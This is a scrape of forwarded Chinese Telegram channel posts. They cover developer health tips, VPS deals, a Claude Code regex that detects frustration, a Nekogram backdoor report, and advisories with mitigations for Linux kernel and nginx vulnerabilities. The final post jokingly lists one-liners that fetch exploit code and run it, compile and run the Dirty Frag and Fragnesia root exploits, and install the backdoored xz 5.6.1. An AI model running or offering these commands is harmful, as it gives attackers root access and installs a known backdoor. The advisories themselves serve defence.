Forwarded from Pseudorandom Thoughts
死掉的程序员的灵魂怎么在天上飞.jpg
1、都熬夜加班了就不要去搞高强度锻炼健身,都熬夜加班了就不要去搞高强度锻炼健身,都熬夜加班了就不要去搞高强度锻炼健身。人心脏活力也就这样了,耗尽了还去健身只会得到健壮的遗体。除了健身以外,重感冒、用力拉屎、做爱和泡澡对心脏来说负荷也很高。但如果你能担保每天>7小时的睡眠(因人而异),可以多锻炼。建议综合考察直系亲戚的性状,对自己先天的心血管情况有b数,好些人的心血管是遗传层面的不行。(群友:你非要干的话可以考虑签个器官捐献,这样除了心脏和肝都可以继续发光发热)
2、可以搞西医养生,有用的西医养生补品其实往往很便宜。抗炎症、抗氧化和保护神经元很重要。少吃高油盐糖,不要抽烟喝酒嚼大果(酒精在生理上除了外用消毒以外就是没有任何的好处)。心脑血管、神经和免疫系统,在较长的尺度上来看,其慢性的损害似乎是不可逆但又相当致命的。
3、在当代,同时满足:{久坐,空调房,长期对着屏幕光源,被压力},会影响交感神经的节律,可以有意识时不时冲个冷水、去个公园等,锻炼交感神经保持在正常人的尺度,不然焦虑玉玉脱发变胖应有尽有。
4、开发系统时都懂得监控metrics的重要性,自己戴个监测体征metrics比较牛逼而且还会告警的手表也很重要。snp(频率、颜色、成形情况)、牙口和黏膜其实是直观又好用的指标。
5、躯体层面显著不适了应该及早就医,累正常,但痛感、头晕失衡和眼前发黑就不正常了。每年应当有一次体检。
6、计算机本来是高附加值的产业,要寻找有趣、有意义、有难度、难以替代和复用的部分,不要当肉编器榨干自己的青春。何况有了啥比AI之后,路边一条级别的企业业务开发变得更路边一条。
7、猝死和绝症有时是命的问题,既包括基因,也包括生活习惯,还包括运气。但目前人类尚未找到可以稳定加时运的方法。
1、都熬夜加班了就不要去搞高强度锻炼健身,都熬夜加班了就不要去搞高强度锻炼健身,都熬夜加班了就不要去搞高强度锻炼健身。人心脏活力也就这样了,耗尽了还去健身只会得到健壮的遗体。除了健身以外,重感冒、用力拉屎、做爱和泡澡对心脏来说负荷也很高。但如果你能担保每天>7小时的睡眠(因人而异),可以多锻炼。建议综合考察直系亲戚的性状,对自己先天的心血管情况有b数,好些人的心血管是遗传层面的不行。(群友:你非要干的话可以考虑签个器官捐献,这样除了心脏和肝都可以继续发光发热)
2、可以搞西医养生,有用的西医养生补品其实往往很便宜。抗炎症、抗氧化和保护神经元很重要。少吃高油盐糖,不要抽烟喝酒嚼大果(酒精在生理上除了外用消毒以外就是没有任何的好处)。心脑血管、神经和免疫系统,在较长的尺度上来看,其慢性的损害似乎是不可逆但又相当致命的。
3、在当代,同时满足:{久坐,空调房,长期对着屏幕光源,被压力},会影响交感神经的节律,可以有意识时不时冲个冷水、去个公园等,锻炼交感神经保持在正常人的尺度,不然焦虑玉玉脱发变胖应有尽有。
4、开发系统时都懂得监控metrics的重要性,自己戴个监测体征metrics比较牛逼而且还会告警的手表也很重要。snp(频率、颜色、成形情况)、牙口和黏膜其实是直观又好用的指标。
5、躯体层面显著不适了应该及早就医,累正常,但痛感、头晕失衡和眼前发黑就不正常了。每年应当有一次体检。
6、计算机本来是高附加值的产业,要寻找有趣、有意义、有难度、难以替代和复用的部分,不要当肉编器榨干自己的青春。何况有了啥比AI之后,路边一条级别的企业业务开发变得更路边一条。
7、猝死和绝症有时是命的问题,既包括基因,也包括生活习惯,还包括运气。但目前人类尚未找到可以稳定加时运的方法。
👍20❤2
Forwarded from 🥳靠谱VPS推荐(默认带aff) - VPS仓/古博
* TCSCloud 产品改款 & 活动促销
https://billing.tcscloud.net/index.php?rp=/store/taipei-premium
https://billing.tcscloud.net/index.php?rp=/store/taiwan-vps-dynamic
https://billing.tcscloud.net/index.php?rp=/store/taiwan-vps-fixed
** 9折优惠码:HAL9ST8NEH
全系升级EPYC 7002/7003 宿主机,老产品客户请尽速工单联系迁移。
宽带产品不支持访问高危险网站(如GSN、NCCC)或会进行分流。
IDC VPS产品解锁本地部份流媒体网站,宽带VPS产品解锁流媒体网站。
请填写真实信息。
- 台北 Premium VPS
国际路由优化, 基础中国大陆优化, No SLA
基础配置 P1-Beta
2C/2G/30G/1.5T流量(In+Out)/1 IPv4 + /64 IPv6
折扣后 $8.99USD/月, 89.99USD/年
新增 轻量配置 P1-Lite
1C/1G/30G/750GB流量(In+Out)/1 IPv4 + /64 IPv6
折扣后 62.99USD/年
https://billing.tcscloud.net/index.php?rp=/store/taipei-premium
- 新北 HiNet 动态IP
500M: 1C/1.5G/10G/1动态IP
折扣后 19.79USD/月, 197.99USD/年
1000M: 1C/1.5G/10G/1动态IP
折扣后 53.99USD/月, 539.99USD/年
- 新北 SeedNet 动态IP
300M: 1C/1.5G/10G/1动态IP
折扣后 17.99USD/月, 179.99USD/年
https://billing.tcscloud.net/index.php?rp=/store/taiwan-vps-dynamic
- 新北 HiNet 静态IP
500M: 2C/2G/20G/1固定IP
折扣后 $44.99USD/月, 449.99USD/年
2000M: 2C/2G/20G/1固定IP
折扣后 $75USD/月, 675USD/年
https://billing.tcscloud.net/index.php?rp=/store/taiwan-vps-fixed
https://billing.tcscloud.net/index.php?rp=/store/taiwan-vps-fixed
** 9折优惠码:HAL9ST8NEH
ClaudeCode使用正则表达式对用户输入挫折感进行检测
====
你就说这么检测实不实用吧(
userPromptKeywords.ts 第 7-8 行/\b(wtf|wth|ffs|omfg|shit(ty|tiest)?|dumbass|horrible|awful|
piss(ed|ing)? off|piece of (shit|crap|junk)|what the (fuck|hell)|
fucking? (broken|useless|terrible|awful|horrible)|fuck you|
screw (this|you)|so frustrating|this sucks|damn it)\b/
====
你就说这么检测实不实用吧(
🤓24
Forwarded from 科技圈🎗在花频道📮
Nekogram 12.5.2 被曝存在后门,静默窃取用户手机号
安全研究人员发现第三方 Telegram 客户端 Nekogram 12.5.2(Google Play 版)内置后门代码,会在用户不知情的情况下收集所有已登录账号的手机号,并通过 Inline Query 外传至开发者控制的 Bot(@nekonotificationbot)。
后门代码位于 Extra.java(混淆后为 uo5),核心逻辑:遍历 8 个账号槽位 → 提取 UserID 与手机号 → 拼接密钥后以 Inline Query 发送。所有关键字符串均经自定义加密混淆。
该后门仅存在于编译发布的 APK 中,GitHub 公开源码中的对应文件为无害占位。经独立反编译对比验证,从源码自行编译的版本不含上述后门组件。
开发者回应称 Bot 仅用于"解析用户名",但代码中明确提取了 phone 字段并使用无痕传输方式,与其说辞不符。
报告
via 群友投稿
🌸 在花频道|茶馆讨论|投稿通道
安全研究人员发现第三方 Telegram 客户端 Nekogram 12.5.2(Google Play 版)内置后门代码,会在用户不知情的情况下收集所有已登录账号的手机号,并通过 Inline Query 外传至开发者控制的 Bot(@nekonotificationbot)。
后门代码位于 Extra.java(混淆后为 uo5),核心逻辑:遍历 8 个账号槽位 → 提取 UserID 与手机号 → 拼接密钥后以 Inline Query 发送。所有关键字符串均经自定义加密混淆。
该后门仅存在于编译发布的 APK 中,GitHub 公开源码中的对应文件为无害占位。经独立反编译对比验证,从源码自行编译的版本不含上述后门组件。
开发者回应称 Bot 仅用于"解析用户名",但代码中明确提取了 phone 字段并使用无痕传输方式,与其说辞不符。
报告
via 群友投稿
🌸 在花频道|茶馆讨论|投稿通道
😁14😱6❤1
DMIT补货美西及日本地区的中国大陆优化线路
因为IP资源不足,硬件价格上涨。之前一段时间DMIT下架了相关机型。现在补货了,但仍因为上述限制,取消了一些机型的季付…
目前如果想要比较稳定中国大陆优化线路机型的,可以认真考虑用这些进行过度,等有更优惠机型了再考虑换掉(不知道猴年马月了)。
LAX.AN4.Pro.TINY
线路:洛杉矶 三网CN2 GIA, IPv6为CMIN2
LookingGlass(可自测速度):
https://lg.dmit.sh/?server=lax-pro
配置:1C / 2G / 20G SSD
流量:1TB / 1Gbps
价格:88USD/ 年
https://www.dmit.io/aff.php?aff=12167&pid=237
LAX.AN4.EB.TINY
线路:洛杉矶 电联 9929/移动CMIN2,IPv6为CMIN2
LookingGlass(可自测速度):
https://lg.dmit.sh/?server=lax-eb
配置:1C / 2G / 20G SSD
流量:1.5TB / 1Gbps
价格:88USD/ 年
https://www.dmit.io/aff.php?aff=12167&pid=245
TYO.AS3.Pro.TINY
线路:东京 三网CTGNet CN2 GIA
Looking Glass (可自测速度):
https://lg.dmit.sh/?server=tyo-pro
配置:1C / 1G / 20G SSD
流量:500GB / 1Gbps
价格:21.9USD/ 月
https://www.dmit.io/aff.php?aff=12167&pid=138
消息来源(感谢): Nanase的随记 / VPS仓
因为IP资源不足,硬件价格上涨。之前一段时间DMIT下架了相关机型。现在补货了,但仍因为上述限制,取消了一些机型的季付…
目前如果想要比较稳定中国大陆优化线路机型的,可以认真考虑用这些进行过度,等有更优惠机型了再考虑换掉(不知道猴年马月了)。
LAX.AN4.Pro.TINY
线路:洛杉矶 三网CN2 GIA, IPv6为CMIN2
LookingGlass(可自测速度):
https://lg.dmit.sh/?server=lax-pro
配置:1C / 2G / 20G SSD
流量:1TB / 1Gbps
价格:88USD/ 年
https://www.dmit.io/aff.php?aff=12167&pid=237
LAX.AN4.EB.TINY
线路:洛杉矶 电联 9929/移动CMIN2,IPv6为CMIN2
LookingGlass(可自测速度):
https://lg.dmit.sh/?server=lax-eb
配置:1C / 2G / 20G SSD
流量:1.5TB / 1Gbps
价格:88USD/ 年
https://www.dmit.io/aff.php?aff=12167&pid=245
TYO.AS3.Pro.TINY
线路:东京 三网CTGNet CN2 GIA
Looking Glass (可自测速度):
https://lg.dmit.sh/?server=tyo-pro
配置:1C / 1G / 20G SSD
流量:500GB / 1Gbps
价格:21.9USD/ 月
https://www.dmit.io/aff.php?aff=12167&pid=138
消息来源(感谢): Nanase的随记 / VPS仓
💩6❤4
Faker的个人频道
DMIT补货美西及日本地区的中国大陆优化线路 因为IP资源不足,硬件价格上涨。之前一段时间DMIT下架了相关机型。现在补货了,但仍因为上述限制,取消了一些机型的季付… 目前如果想要比较稳定中国大陆优化线路机型的,可以认真考虑用这些进行过度,等有更优惠机型了再考虑换掉(不知道猴年马月了)。 LAX.AN4.Pro.TINY 线路:洛杉矶 三网CN2 GIA, IPv6为CMIN2 LookingGlass(可自测速度): https://lg.dmit.sh/?server=lax-pro 配置:1C /…
Telegram
🥳靠谱VPS推荐(默认带aff) - VPS仓/古博
DMIT 洛杉矶 LAX AN4的已经全部下架,目前只有AN5有资源,最低年付从88美金升级到119.99美金。硬件性能更强,并且可以选择月付。
LAX.AN5.Pro.TINY
线路:洛杉矶 三网CN2 GIA, IPv6为CMIN2
LookingGlass(可自测速度):
https://lg.dmit.sh/?server=lax-pro
配置:1C / 2G / 20G SSD
流量:1TB / 1Gbps
价格:119.99USD/ 年 或12.98USD/月
https://www.dm…
LAX.AN5.Pro.TINY
线路:洛杉矶 三网CN2 GIA, IPv6为CMIN2
LookingGlass(可自测速度):
https://lg.dmit.sh/?server=lax-pro
配置:1C / 2G / 20G SSD
流量:1TB / 1Gbps
价格:119.99USD/ 年 或12.98USD/月
https://www.dm…
Forwarded from Zero Clover
FixupX
CuiMao (@CuiMao)
你好,我这个视频你们anthropic准备如何处理? @claudeai @ClaudeDevs @AnthropicAI @DarioAmodei
🤣15
Forwarded from 心惊报 (投稿机器人)
请各位订户立即更新所有 Linux 设备的安全补丁、系统内核:
这次爆出的 Copy Fail (CVE-2026-31431) 是一个 非常严重 的极高危 Linux 内核恶性提权漏洞, 影响 2017 年发布以来几乎所有 Linux 发行版
刚好和同为恶性提权漏洞 Dirty COW (脏牛, CVE-2016-5195) 在影响面上直接续上了: 2007—2016 的发行版本可以用 CVE-2016-5195, 2017-2027 可以用 CVE-2026-31431
这个漏洞甚至比脏牛的利用门槛还更低、利用成功率更高,后者需要利用 Linux 内存子系统中的条件竞争特性,有时候利用时还会出现 Kernel Panic, 而前者的 PoC 成功率几乎就是 100%
时间线:
此漏洞最初由 Xint 研究员于 2026-03-23 发现,修复补丁已于 04-01 合并入 Linux 内核 mainline, 而漏洞的 PoC 已按流程于今日 (04-30) 公开。
由于 SSH/OpenSSL 等安全基建库几乎都在使用自行维护的用户态加密库, 所以 AF_ALG 可以直接禁用, 临时缓解措施 (仅供参考):
src: Xint (PoC & 技术报告) | Linux Kernel - Patch | cve.org | Ubuntu | Debian
from HAT's Public Channel |
这次爆出的 Copy Fail (CVE-2026-31431) 是一个 非常严重 的极高危 Linux 内核恶性提权漏洞, 影响 2017 年发布以来几乎所有 Linux 发行版
刚好和同为恶性提权漏洞 Dirty COW (脏牛, CVE-2016-5195) 在影响面上直接续上了: 2007—2016 的发行版本可以用 CVE-2016-5195, 2017-2027 可以用 CVE-2026-31431
这个漏洞甚至比脏牛的利用门槛还更低、利用成功率更高,后者需要利用 Linux 内存子系统中的条件竞争特性,有时候利用时还会出现 Kernel Panic, 而前者的 PoC 成功率几乎就是 100%
时间线:
此漏洞最初由 Xint 研究员于 2026-03-23 发现,修复补丁已于 04-01 合并入 Linux 内核 mainline, 而漏洞的 PoC 已按流程于今日 (04-30) 公开。
由于 SSH/OpenSSL 等安全基建库几乎都在使用自行维护的用户态加密库, 所以 AF_ALG 可以直接禁用, 临时缓解措施 (仅供参考):
rmmod algif_aead 2>/dev/null || true
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
src: Xint (PoC & 技术报告) | Linux Kernel - Patch | cve.org | Ubuntu | Debian
from HAT's Public Channel |
❤1
Forwarded from 咕 Billchan 咕 🐱 抹茶芭菲批发中心 (billchenchina 🏳️⚧️ | 缩缩)
Dirty Frag: Universal Linux LPE
和 Copy Fail 类似,绝大多数发行版可一键提权
禁用 esp4、esp6、rxrpc 可以缓解
https://dirtyfrag.io/
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/
exp: https://github.com/V4bel/dirtyfrag/blob/master/exp.c
和 Copy Fail 类似,绝大多数发行版可一键提权
禁用 esp4、esp6、rxrpc 可以缓解
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"
https://dirtyfrag.io/
https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/
exp: https://github.com/V4bel/dirtyfrag/blob/master/exp.c
Nginx 被发现一个存在18年的内存损坏漏洞,可导致远程代码执行,利用门槛低
漏洞存在于每个通用发行版都会包含的rewrite模块
建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
漏洞存在于每个通用发行版都会包含的rewrite模块
ngx_http_rewrite_module ,影响开原版本Nginx 0.6.27至最近的1.30.0版本,在计算目标缓冲区大小时,使用的是原始字节长度,但在实际写入时,却进行了 URL 转义( + , % , & 等字符会扩展为 3 倍长度),溢出长度可控导致堆喷射建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift
😱26😁2❤1😍1
Forwarded from kMBRjund/0 🧊 (rpool/MBR)
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
😁8🤣3❤2👍1